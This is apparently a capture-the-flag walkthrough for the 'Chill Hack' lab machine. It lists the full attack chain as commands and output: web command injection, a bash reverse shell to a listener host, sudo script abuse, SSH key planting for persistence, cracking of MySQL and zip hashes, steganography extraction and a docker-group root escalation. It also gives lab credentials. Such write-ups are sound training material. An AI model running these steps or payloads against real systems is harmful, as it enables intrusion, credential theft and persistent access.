Name
Description
📝 Easy level CTF. Capture the flags and have fun!
Target IP
🎯
10.10.141.41
su
echo "10.10.141.41 chillhack.thm" >> /etc/hosts
# At the end of the room
# To clean up the last line from the /etc/hosts file
sed -i '$ d' /etc/hosts
Start Reconnaissance
mkdir thm/chillhack
cd thm/chillhack
nmap chillhack.thm
21/tcp open ftp
22/tcp open ssh
80/tcp open http
nmap -sV -sC -Pn -O -oA chillhack chillhack.thm
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 1001 1001 90 Oct 03 2020 note.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.18.65.48
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 09f95db918d0b23a822d6e768cc20144 (RSA)
| 256 1bcf3a498b1b20b02c6aa551a88f1e62 (ECDSA)
|_ 256 3005cc52c66f6504860f7241c8a439cf (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Game Info
Enumerate Web server directories
gobuster dir -u http://chillhack.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
/images (Status: 301) [Size: 315] [--> http://chillhack.thm/images/]
/css (Status: 301) [Size: 312] [--> http://chillhack.thm/css/]
/js (Status: 301) [Size: 311] [--> http://chillhack.thm/js/]
/fonts (Status: 301) [Size: 314] [--> http://chillhack.thm/fonts/]
/secret (Status: 301) [Size: 315] [--> http://chillhack.thm/secret/]
Navigate to
http://chillhack.thm/secret/
- input a command. It works, a Command Injection vulnerability is present in the web server.
# Open a listener on the Kali machine
nc -nvlp 3333
Input a command to get a reverse shell
/bin/bash -c '/bin/bash -i >& /dev/tcp/10.18.65.48/3333 0>&1'
Get a Full TTY shell on the server
python3 -c 'import pty; pty.spawn("/bin/bash")'
# Background CTRL+Z
stty raw -echo && fg
# ENTER
export SHELL=/bin/bash
export TERM=screen
stty rows 36 columns 157
reset
sudo -l
/home/apaar/.helpline.sh
file can be run by the www-data
user as user apaar
ls -lah /home/apaar/
-rw------- 1 apaar apaar 0 Oct 4 2020 .bash_history
-rw-r--r-- 1 apaar apaar 220 Oct 3 2020 .bash_logout
-rw-r--r-- 1 apaar apaar 3.7K Oct 3 2020 .bashrc
drwx------ 2 apaar apaar 4.0K Oct 3 2020 .cache
drwx------ 3 apaar apaar 4.0K Oct 3 2020 .gnupg
-rwxrwxr-x 1 apaar apaar 286 Oct 4 2020 .helpline.sh
-rw-r--r-- 1 apaar apaar 807 Oct 3 2020 .profile
drwxr-xr-x 2 apaar apaar 4.0K Oct 3 2020 .ssh
-rw------- 1 apaar apaar 817 Oct 3 2020 .viminfo
-rw-rw---- 1 apaar apaar 46 Oct 4 2020 local.txt
cat /etc/passwd
Get a shell as user apaar
sudo -u apaar /home/apaar/.helpline.sh
# in the messagte input:
/usr/bin/script -qc /bin/bash /dev/null
cd
cat /home/apaar/local.txt
ss -tnl
Local Address:Port
127.0.0.1:9001
127.0.0.1:3306
127.0.0.53%lo:53
0.0.0.0:22
*:80
*:21
[::]:22
Use SSH Port Forwarding to access the local open port 9001
.
Stabilize with a SSH connection by generating a SSH key and put it into the apaar
's user authorized_keys
# Kali
ssh-keygen -f apaar_rsa
chmod 600 apaar_rsa
cat apaar_rsa.pub
# Back to the Chillhack box "apaar" shell
cd /home/apaar/.ssh
echo "<apaar_rsa.pub_Output>" >> authorized_keys
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC8g6f2IrM5xN6SdfgZs1c7O76SZIQSIKjQ7BjYofmLSxRFWG/yXvexxidE+Ka+qV1HzPaCbOZ8TTowMRnonni699Isnx8/Aljs4vpHgOBJpf9jXzjlh4mjO0SgflfvecnTPIVz4ISn2UviCOm2XnlzJeFdcNm8Ej71+A4MKoPDWp9xSaLISebR28Y3phWvsuyBDt35Nc9Je1nKc9Oc7zROmSomQTJCsXBTRDqDLaImAXwvXMXbfMDPvZRXD4Vag/RusBqmlSaKNpCg+4ggDn1jELMVRWI0aFSMC4iRHA4tENmwM/D+gBu6/EUemuYhYJcaH0dPvVpri5/TXy8k418uJMJWRbh66Gy7pUG44U7jNu4M1OWUJNOw3fcUDRo6udz4/XgDDCBAICXK9b38Ar3ykH+nPuBW1GrivOq+iiXAILJ9yPTdDjirUcrTaEze3Eq/r/vQO5kvMe9wWhUtr87EFDSuFfZt/F0asKFjCbQ/Xk8a4hUfC+FC8jnik94KiQ8=" >> /home/apaar/.ssh/authorized_keys
# Try the SSH port forwarding with the key
ssh -L 9001:127.0.0.1:9001 -i apaar_rsa apaar@chillhack.thm
Navigate to
http://chillhack.thm:9001/
ls -lah /var/www/files/
cat account.php
cat hacker.php
cat index.php
# MySQL root password !@m+her00+@db
su
# the password does NOT work for "root" user
This part can be skipped directly to SCP download of the necessary
hacker-with-laptop_23-2147985341.jpg
file.Enumerate MySQL with
root
:!@m+her00+@db
mysql -u root -p webportal SHOW tables; SELECT * from users;+----+-----------+----------+-----------+----------------------------------+ | id | firstname | lastname | username | password | +----+-----------+----------+-----------+----------------------------------+ | 1 | Anurodh | Acharya | Aurick | 7e53614ced3640d5de23f111806cc4fd | | 2 | Apaar | Dahal | cullapaar | 686216240e5af30df0501e53c789a649 | +----+-----------+----------+-----------+----------------------------------+
- Check the two password strings
hash-identifier 7e53614ced3640d5de23f111806cc4fd hash-identifier 686216240e5af30df0501e53c789a649 # Possible Hash is MD5
- Check them on https://crackstation.net/
Hash Type Result 7e53614ced3640d5de23f111806cc4fd md5 masterpassword 686216240e5af30df0501e53c789a649 md5 dontaskdonttell📌 Login credentials are:
Aurick
:masterpassword
cullapaar
:dontaskdonttell
Login to the portal
http://chillhack.thm:9001/
. The successful login redirect tohacker.php
page where there is a hacker with laptop.jpg
file that needs to be downloaded.
Download the hacker-with-laptop_23-2147985341.jpg
file using scp
scp <USER>@<TARGET_IP>:~/.ssh/id_rsa .
scp -i apaar_rsa apaar@chillhack.thm:/var/www/files/images/hacker-with-laptop_23-2147985341.jpg .
Check the image file with steghide
steghide info hacker-with-laptop_23-2147985341.jpg
"hacker-with-laptop_23-2147985341.jpg":
format: jpeg
capacity: 3.6 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
embedded file "backup.zip":
size: 750.0 Byte
encrypted: rijndael-128, cbc
compressed: yes
steghide extract -sf hacker-with-laptop_23-2147985341.jpg
unzip backup.zip
# Password necessary
zip2john backup.zip > backupzip.hash
john backupzip.hash --wordlist=/usr/share/wordlists/rockyou.txt
unzip backup.zip
# use "pass1word"
Check the unzipped file
cat source_code.php
Decrypt the base64 hash
echo "IWQwbnRLbjB3bVlwQHNzdzByZA==" | base64 -d
📌
anurodh
:!d0ntKn0wmYp@ssw0rd
# In the "apaar" shell session
su anurodh
id
anurodh
is in the docker group. Spawn a root
shell by using a docker
command.
- Check it from the GTFOBins - Docker list
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
python3 -c 'import pty;pty.spawn("/bin/bash")'
ls /root
cat /root/proof.txt
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC8g6f2IrM5xN6SdfgZs1c7O76SZIQSIKjQ7BjYofmLSxRFWG/yXvexxidE+Ka+qV1HzPaCbOZ8TTowMRnonni699Isnx8/Aljs4vpHgOBJpf9jXzjlh4mjO0SgflfvecnTPIVz4ISn2UviCOm2XnlzJeFdcNm8Ej71+A4MKoPDWp9xSaLISebR28Y3phWvsuyBDt35Nc9Je1nKc9Oc7zROmSomQTJCsXBTRDqDLaImAXwvXMXbfMDPvZRXD4Vag/RusBqmlSaKNpCg+4ggDn1jELMVRWI0aFSMC4iRHA4tENmwM/D+gBu6/EUemuYhYJcaH0dPvVpri5/TXy8k418uJMJWRbh66Gy7pUG44U7jNu4M1OWUJNOw3fcUDRo6udz4/XgDDCBAICXK9b38Ar3ykH+nPuBW1GrivOq+iiXAILJ9yPTdDjirUcrTaEze3Eq/r/vQO5kvMe9wWhUtr87EFDSuFfZt/F0asKFjCbQ/Xk8a4hUfC+FC8jnik94KiQ8=" >> /root/.ssh/authorized_keys
ssh -i apaar_rsa root@chillhack.thm